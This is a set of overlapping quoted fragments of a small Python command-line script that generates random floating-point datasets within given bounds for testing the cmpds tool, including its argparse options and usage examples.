"''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''') opts = parser.parse_args() return",
"in generate_dataset(num, lower, upper): if opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places)",
"version number and exit. \"\"\") # Positional arguments at the end. parser.add_argument('num', nargs=1,",
"to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): '''",
"<LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1:",
"err(msg, f=1): ''' Write an error message to stderr and exit. ''' lineno",
"precision. # Typically you would want to generate at least 50 # elements",
"desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1: help $",
"i = 0 for r in generate_dataset(num, lower, upper): if opts.decorate: i +=",
"''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version', action='version',",
"1: help $ {0} -h # Example 2: generate a dataset that mocks",
"5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage,",
"metavar=('NUMBER'), default=3, help='''The number of decimal places. The default is %(default)s. ''') parser.add_argument('-D',",
"= 8 # lower = 115.000 # upper = 125.000 # decimal places",
"Example 3: generate a dataset that mocks runtimes between # 115 and 125",
"decimal places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and",
"n elements in the range [lower..upper]. A typical call might be something like:",
"{0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES:",
"getopts(): ''' Get the command line options using argparse. ''' # Trick to",
"decimal places = 2 1 10.30 2 11.48 3 10.50 4 10.25 5",
"a dataset that mocks runtimes between # 10 and 12 seconds with 2",
"and exit': 'Show this help message and exit.\\n ', } return lookup.get(s, s)",
"# date = 2016-11-24 08:30:31.039108 # num = 6 # lower = 10.000",
"# Positional arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of",
"SND for analysis. $ {0} 8 115 125 124.409 121.153 116.976 115.358 123.128",
"of precision. # Typically you would want to generate at least 50 #",
"analysis. $ {0} -D 8 115 125 # date = 2016-11-24 08:27:49.668509 #",
"''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\")",
"125 # date = 2016-11-24 08:27:49.668509 # num = 8 # lower =",
"lower, upper): if opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r))",
"= opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if lower > upper: err('lower",
"info message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg,",
"Example 1: help $ {0} -h # Example 2: generate a dataset that",
"in range(n): r = random.uniform(lower, upper) yield r def info(msg, f=1): ''' Write",
"lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a warning",
"= 125.000 # decimal places = 3 1 116.212 2 122.327 3 118.571",
"be less than upper bound {}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now()))",
"decimal digits of precision. # Typically you would want to generate at least",
"of the \":\" reliably. def gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional",
"8 # lower = 115.000 # upper = 125.000 # decimal places =",
"decorate the datasets with a header and record counts to make them easier",
"def generate_dataset(n, lower, upper): ''' Generate a datasets of n elements in the",
"'OPTIONAL ARGUMENTS', 'show this help message and exit': 'Show this help message and",
"to capitalize help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n",
"a dataset that mocks runtimes between # 115 and 125 seconds per run.",
"sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the command line options using",
"upper bound {}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num =",
"f=1): ''' Write a warning message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{}",
"of elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound.",
"123.128 121.975 124.312 122.044 # Example 3: generate a dataset that mocks runtimes",
"It is used to create datasets to test cmpds. You can decorate the",
"to make them easier to read. That works because cmpds allows you to",
"MIT Open Source # Copyright (c) 2016 by <NAME> import argparse import datetime",
"$ {0} -h # Example 2: generate a dataset that mocks runtimes between",
"You can decorate the datasets with a header and record counts to make",
"116.976 115.358 123.128 121.975 124.312 122.044 # Example 3: generate a dataset that",
"121.975 124.312 122.044 # Example 3: generate a dataset that mocks runtimes between",
"''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write an",
"Generate random floating point numbers in a range for testing. It is used",
"115 125 # date = 2016-11-24 08:27:49.668509 # num = 8 # lower",
"the use of the SND for analysis. $ {0} 8 115 125 124.409",
"upper = opts.upper[0] if lower > upper: err('lower bound {} must be less",
"= gettext # to capitalize help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0]",
"in the dataset file. Typically you would want to generate at least 50",
"# to capitalize help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage =",
"with 2 decimal digits of precision. # Typically you would want to generate",
"elements to enable the use of the SND for analysis. $ {0} -D",
"''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the",
"runtimes between # 115 and 125 seconds per run. # Typically you would",
"that mocks runtimes between # 115 and 125 seconds per run. # Typically",
"r''' EXAMPLES: # Example 1: help $ {0} -h # Example 2: generate",
"capitalize the built-in headers. # Unfortunately I can't get rid of the \":\"",
"record counts to make them easier to read. That works because cmpds allows",
"with a header and record counts to make them easier to read. That",
"Get the command line options using argparse. ''' # Trick to capitalize the",
"between # 115 and 125 seconds per run. # Typically you would want",
"6 # lower = 10.000 # upper = 12.000 # decimal places =",
"built-in headers. # Unfortunately I can't get rid of the \":\" reliably. def",
"and 125 seconds per run. # Typically you would want to generate at",
"mocks runtimes between # 10 and 12 seconds with 2 decimal digits of",
"10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog)",
"{:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num,",
"<reponame>jlinoff/cmpds<gh_stars>0 #!/usr/bin/env python ''' Generate random floating point numbers in a range for",
"= '0.1' def generate_dataset(n, lower, upper): ''' Generate a datasets of n elements",
"4 10.25 5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc,",
"SND for analysis. $ {0} -D -d 2 6 10 12 # date",
"8 115 125 # date = 2016-11-24 08:27:49.668509 # num = 8 #",
"gettext # to capitalize help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage",
"# 115 and 125 seconds per run and is decorated. # Typically you",
"= {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper =",
"a warning message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def",
"argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3,",
"= 2016-11-24 08:30:31.039108 # num = 6 # lower = 10.000 # upper",
"dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store',",
"info(msg, f=1): ''' Write an info message to stdout. ''' lineno = inspect.stack()[f][2]",
"in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper',",
"upper): if opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else:",
"118.571 4 120.238 5 124.852 6 119.652 7 116.400 8 122.446 # Example",
"for analysis. $ {0} -D 8 115 125 # date = 2016-11-24 08:27:49.668509",
"used to create datasets to test cmpds. You can decorate the datasets with",
"the \":\" reliably. def gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional arguments':",
"call might be something like: n = 50 lower = 98 upper =",
"help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS]",
"6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d',",
"action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places. The default is %(default)s.",
"using argparse. ''' # Trick to capitalize the built-in headers. # Unfortunately I",
"4 120.238 5 124.852 6 119.652 7 116.400 8 122.446 # Example 4:",
"exit.\\n ', } return lookup.get(s, s) argparse._ = gettext # to capitalize help",
"\":\" reliably. def gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL",
"and 125 seconds per run and is decorated. # Typically you would want",
"# Trick to capitalize the built-in headers. # Unfortunately I can't get rid",
"Trick to capitalize the built-in headers. # Unfortunately I can't get rid of",
"dataset that mocks runtimes between # 115 and 125 seconds per run. #",
"11.48 3 10.50 4 10.25 5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter",
"'--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\") # Positional",
"a datasets of n elements in the range [lower..upper]. A typical call might",
"125 seconds per run and is decorated. # Typically you would want to",
"decorated. # Typically you would want to generate at least 50 # elements",
"def err(msg, f=1): ''' Write an error message to stderr and exit. '''",
"exit': 'Show this help message and exit.\\n ', } return lookup.get(s, s) argparse._",
"''' opts = getopts() num = opts.num[0] lower = opts.lower[0] upper = opts.upper[0]",
"124.852 6 119.652 7 116.400 8 122.446 # Example 4: generate a dataset",
"50 # elements to enable the use of the SND for analysis. $",
"#!/usr/bin/env python ''' Generate random floating point numbers in a range for testing.",
"that mocks runtimes between # 115 and 125 seconds per run and is",
"the range [lower..upper]. A typical call might be something like: n = 50",
"range [lower..upper]. A typical call might be something like: n = 50 lower",
"= 115.000 # upper = 125.000 # decimal places = 3 1 116.212",
"10 12 # date = 2016-11-24 08:30:31.039108 # num = 6 # lower",
"= getopts() num = opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if lower",
"122.044 # Example 3: generate a dataset that mocks runtimes between # 115",
"$ {0} -D -d 2 6 10 12 # date = 2016-11-24 08:30:31.039108",
"an error message to stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno,",
"# upper = 125.000 # decimal places = 3 1 116.212 2 122.327",
"''' Write an error message to stderr and exit. ''' lineno = inspect.stack()[f][2]",
"main(): ''' Main entry point. ''' opts = getopts() num = opts.num[0] lower",
"the dataset file. Typically you would want to generate at least 50 elements",
"and exit. \"\"\") # Positional arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int,",
"= '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog =",
"v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\") # Positional arguments at the",
"3 1 116.212 2 122.327 3 118.571 4 120.238 5 124.852 6 119.652",
"column to read in the dataset file. Typically you would want to generate",
"want to generate at least 50 # elements to enable the use of",
"elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''')",
"number of elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower",
"= random.uniform(lower, upper) yield r def info(msg, f=1): ''' Write an info message",
"the use of the SND for analysis. $ {0} -D -d 2 6",
"''' Main entry point. ''' opts = getopts() num = opts.num[0] lower =",
"the use of the standard normal distribution (SND) for analysis. ''' # License:",
"Positional arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements",
"to test cmpds. You can decorate the datasets with a header and record",
"': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message and exit': 'Show",
"version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\") # Positional arguments at",
"inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the command line options",
"error message to stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg))",
"would want to generate at least 50 # elements to enable the use",
"help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''') opts",
"allows you to specify which column to read in the dataset file. Typically",
"%(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose',",
"10 and 12 seconds with 2 decimal digits of precision. # Typically you",
"{}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper))",
"1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r)) if",
"0 for r in generate_dataset(num, lower, upper): if opts.decorate: i += 1 f",
"opts.lower[0] upper = opts.upper[0] if lower > upper: err('lower bound {} must be",
"help $ {0} -h # Example 2: generate a dataset that mocks runtimes",
"= { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message",
"date = 2016-11-24 08:30:31.039108 # num = 6 # lower = 10.000 #",
"numbers in a range for testing. It is used to create datasets to",
"read. That works because cmpds allows you to specify which column to read",
"119.652 7 116.400 8 122.446 # Example 4: generate a dataset that mocks",
"stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write",
"generate at least 50 elements to enable the use of the standard normal",
"f=1): ''' Write an error message to stderr and exit. ''' lineno =",
"message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1):",
"''' Generate random floating point numbers in a range for testing. It is",
"os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc",
"116.400 8 122.446 # Example 4: generate a dataset that mocks runtimes between",
"type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''')",
"115 and 125 seconds per run and is decorated. # Typically you would",
"for testing. It is used to create datasets to test cmpds. You can",
"usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places.",
"and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): '''",
"of the standard normal distribution (SND) for analysis. ''' # License: MIT Open",
"opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower))",
"import inspect import os import random import sys VERSION = '0.1' def generate_dataset(n,",
"<UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1: help",
"python ''' Generate random floating point numbers in a range for testing. It",
"at least 50 elements to enable the use of the standard normal distribution",
"line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V',",
"of n elements in the range [lower..upper]. A typical call might be something",
"upper bound. ''') opts = parser.parse_args() return opts def main(): ''' Main entry",
"analysis. $ {0} -D -d 2 6 10 12 # date = 2016-11-24",
"{ 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message and",
"opts = getopts() num = opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if",
"{:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i = 0",
"distribution (SND) for analysis. ''' # License: MIT Open Source # Copyright (c)",
"125 124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044 # Example 3: generate",
"2 6 10 12 # date = 2016-11-24 08:30:31.039108 # num = 6",
"help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's",
"seconds per run. # Typically you would want to generate at least 50",
"sys.exit(1) def getopts(): ''' Get the command line options using argparse. ''' #",
"datetime import inspect import os import random import sys VERSION = '0.1' def",
"places = 3 1 116.212 2 122.327 3 118.571 4 120.238 5 124.852",
"elements to enable the use of the standard normal distribution (SND) for analysis.",
"usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog",
"nargs=1, action='store', type=float, help='''The upper bound. ''') opts = parser.parse_args() return opts def",
"numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version',",
"and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity. ''')",
"Unfortunately I can't get rid of the \":\" reliably. def gettext(s): lookup =",
"-h # Example 2: generate a dataset that mocks runtimes between # 115",
"# Copyright (c) 2016 by <NAME> import argparse import datetime import inspect import",
"2 1 10.30 2 11.48 3 10.50 4 10.25 5 10.52 6 11.34",
"50 lower = 98 upper = 101 ''' for i in range(n): r",
"= 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1: help $ {0}",
"of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and",
"lower = opts.lower[0] upper = opts.upper[0] if lower > upper: err('lower bound {}",
"print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('#",
"datasets of n elements in the range [lower..upper]. A typical call might be",
"exit. \"\"\") # Positional arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The",
"2016 by <NAME> import argparse import datetime import inspect import os import random",
"can decorate the datasets with a header and record counts to make them",
"'\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r'''",
"enable the use of the SND for analysis. $ {0} -D -d 2",
"line options using argparse. ''' # Trick to capitalize the built-in headers. #",
"least 50 # elements to enable the use of the SND for analysis.",
"parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\") #",
"122.327 3 118.571 4 120.238 5 124.852 6 119.652 7 116.400 8 122.446",
"rid of the \":\" reliably. def gettext(s): lookup = { 'usage: ': 'USAGE:',",
"if lower > upper: err('lower bound {} must be less than upper bound",
"Example 2: generate a dataset that mocks runtimes between # 115 and 125",
"= argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number",
"= parser.parse_args() return opts def main(): ''' Main entry point. ''' opts =",
"opts = parser.parse_args() return opts def main(): ''' Main entry point. ''' opts",
"2 122.327 3 118.571 4 120.238 5 124.852 6 119.652 7 116.400 8",
"per run and is decorated. # Typically you would want to generate at",
"12 seconds with 2 decimal digits of precision. # Typically you would want",
"# lower = 10.000 # upper = 12.000 # decimal places = 2",
"argparse import datetime import inspect import os import random import sys VERSION =",
"import argparse import datetime import inspect import os import random import sys VERSION",
"= r''' EXAMPLES: # Example 1: help $ {0} -h # Example 2:",
"# lower = 115.000 # upper = 125.000 # decimal places = 3",
"10.30 2 11.48 3 10.50 4 10.25 5 10.52 6 11.34 '''.format(base) afc",
"def main(): ''' Main entry point. ''' opts = getopts() num = opts.num[0]",
"# elements to enable the use of the SND for analysis. $ {0}",
"# date = 2016-11-24 08:27:49.668509 # num = 8 # lower = 115.000",
"the datasets with a header and record counts to make them easier to",
"''' for i in range(n): r = random.uniform(lower, upper) yield r def info(msg,",
"'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message and exit': 'Show this help",
"def gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show",
"for analysis. ''' # License: MIT Open Source # Copyright (c) 2016 by",
"Copyright (c) 2016 by <NAME> import argparse import datetime import inspect import os",
"print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places))",
"= 98 upper = 101 ''' for i in range(n): r = random.uniform(lower,",
"= 2016-11-24 08:27:49.668509 # num = 8 # lower = 115.000 # upper",
"action='store', type=int, help='''The number of elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store',",
"= os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base)",
"r = random.uniform(lower, upper) yield r def info(msg, f=1): ''' Write an info",
"lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''') opts =",
"(SND) for analysis. ''' # License: MIT Open Source # Copyright (c) 2016",
"them easier to read. That works because cmpds allows you to specify which",
"Write an info message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg))",
"''' Get the command line options using argparse. ''' # Trick to capitalize",
"enable the use of the standard normal distribution (SND) for analysis. ''' #",
"return lookup.get(s, s) argparse._ = gettext # to capitalize help headers base =",
"of the SND for analysis. $ {0} -D -d 2 6 10 12",
"message and exit': 'Show this help message and exit.\\n ', } return lookup.get(s,",
"115 and 125 seconds per run. # Typically you would want to generate",
"gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this",
"exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get",
"runtimes between # 10 and 12 seconds with 2 decimal digits of precision.",
"r in generate_dataset(num, lower, upper): if opts.decorate: i += 1 f = '{{:>5}}",
"between # 10 and 12 seconds with 2 decimal digits of precision. #",
"epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places. The",
"115.358 123.128 121.975 124.312 122.044 # Example 3: generate a dataset that mocks",
"{}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num, lower, upper): if opts.decorate: i",
"= 10.000 # upper = 12.000 # decimal places = 2 1 10.30",
"120.238 5 124.852 6 119.652 7 116.400 8 122.446 # Example 4: generate",
"point numbers in a range for testing. It is used to create datasets",
"lower, upper): ''' Generate a datasets of n elements in the range [lower..upper].",
"', } return lookup.get(s, s) argparse._ = gettext # to capitalize help headers",
"lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i",
"cmpds allows you to specify which column to read in the dataset file.",
"def warn(msg, f=1): ''' Write a warning message to stdout. ''' lineno =",
"08:27:49.668509 # num = 8 # lower = 115.000 # upper = 125.000",
"date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper",
"message and exit.\\n ', } return lookup.get(s, s) argparse._ = gettext # to",
"# upper = 12.000 # decimal places = 2 1 10.30 2 11.48",
"'show this help message and exit': 'Show this help message and exit.\\n ',",
"def info(msg, f=1): ''' Write an info message to stdout. ''' lineno =",
"range(n): r = random.uniform(lower, upper) yield r def info(msg, f=1): ''' Write an",
"action='store', type=float, help='''The upper bound. ''') opts = parser.parse_args() return opts def main():",
"like: n = 50 lower = 98 upper = 101 ''' for i",
"generate a dataset that mocks runtimes between # 115 and 125 seconds per",
"message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1):",
"yield r def info(msg, f=1): ''' Write an info message to stdout. '''",
"range for testing. It is used to create datasets to test cmpds. You",
"''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float,",
"sys VERSION = '0.1' def generate_dataset(n, lower, upper): ''' Generate a datasets of",
"parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s",
"and 12 seconds with 2 decimal digits of precision. # Typically you would",
"6 10 12 # date = 2016-11-24 08:30:31.039108 # num = 6 #",
"lower > upper: err('lower bound {} must be less than upper bound {}'.format(lower,",
"name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc =",
"12 # date = 2016-11-24 08:30:31.039108 # num = 6 # lower =",
"and is decorated. # Typically you would want to generate at least 50",
"{0} -D -d 2 6 10 12 # date = 2016-11-24 08:30:31.039108 #",
"Main entry point. ''' opts = getopts() num = opts.num[0] lower = opts.lower[0]",
"action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\") # Positional arguments",
"mocks runtimes between # 115 and 125 seconds per run. # Typically you",
"less than upper bound {}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('#",
"command line options using argparse. ''' # Trick to capitalize the built-in headers.",
"lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the command",
"this help message and exit.\\n ', } return lookup.get(s, s) argparse._ = gettext",
"mocks runtimes between # 115 and 125 seconds per run and is decorated.",
"''' # Trick to capitalize the built-in headers. # Unfortunately I can't get",
"to read. That works because cmpds allows you to specify which column to",
"test cmpds. You can decorate the datasets with a header and record counts",
"bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''') opts = parser.parse_args()",
"must be less than upper bound {}'.format(lower, upper)) if opts.decorate: print('# date =",
"to generate at least 50 elements to enable the use of the standard",
"# 115 and 125 seconds per run. # Typically you would want to",
"type=int, help='''The number of elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float,",
"upper = 12.000 # decimal places = 2 1 10.30 2 11.48 3",
"''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a",
"= argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'),",
"{}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('#",
"upper: err('lower bound {} must be less than upper bound {}'.format(lower, upper)) if",
"bound {} must be less than upper bound {}'.format(lower, upper)) if opts.decorate: print('#",
"Open Source # Copyright (c) 2016 by <NAME> import argparse import datetime import",
"something like: n = 50 lower = 98 upper = 101 ''' for",
"2016-11-24 08:30:31.039108 # num = 6 # lower = 10.000 # upper =",
"number and exit. \"\"\") # Positional arguments at the end. parser.add_argument('num', nargs=1, action='store',",
"= 3 1 116.212 2 122.327 3 118.571 4 120.238 5 124.852 6",
"# Example 4: generate a dataset that mocks runtimes between # 10 and",
"lower = 10.000 # upper = 12.000 # decimal places = 2 1",
"help message and exit': 'Show this help message and exit.\\n ', } return",
"end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements in the dataset. ''')",
"datasets with a header and record counts to make them easier to read.",
"generate at least 50 # elements to enable the use of the SND",
"2 decimal digits of precision. # Typically you would want to generate at",
"arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements in",
"8 115 125 124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044 # Example",
"help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of",
"is decorated. # Typically you would want to generate at least 50 #",
"use of the SND for analysis. $ {0} -D 8 115 125 #",
"description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal",
"analysis. ''' # License: MIT Open Source # Copyright (c) 2016 by <NAME>",
"Write a warning message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg))",
"import datetime import inspect import os import random import sys VERSION = '0.1'",
"SND for analysis. $ {0} -D 8 115 125 # date = 2016-11-24",
"you would want to generate at least 50 # elements to enable the",
"counts to make them easier to read. That works because cmpds allows you",
"opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if lower > upper: err('lower bound",
"digits of precision. # Typically you would want to generate at least 50",
"'''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store',",
"afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int,",
"lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write an error",
"at least 50 # elements to enable the use of the SND for",
"2016-11-24 08:27:49.668509 # num = 8 # lower = 115.000 # upper =",
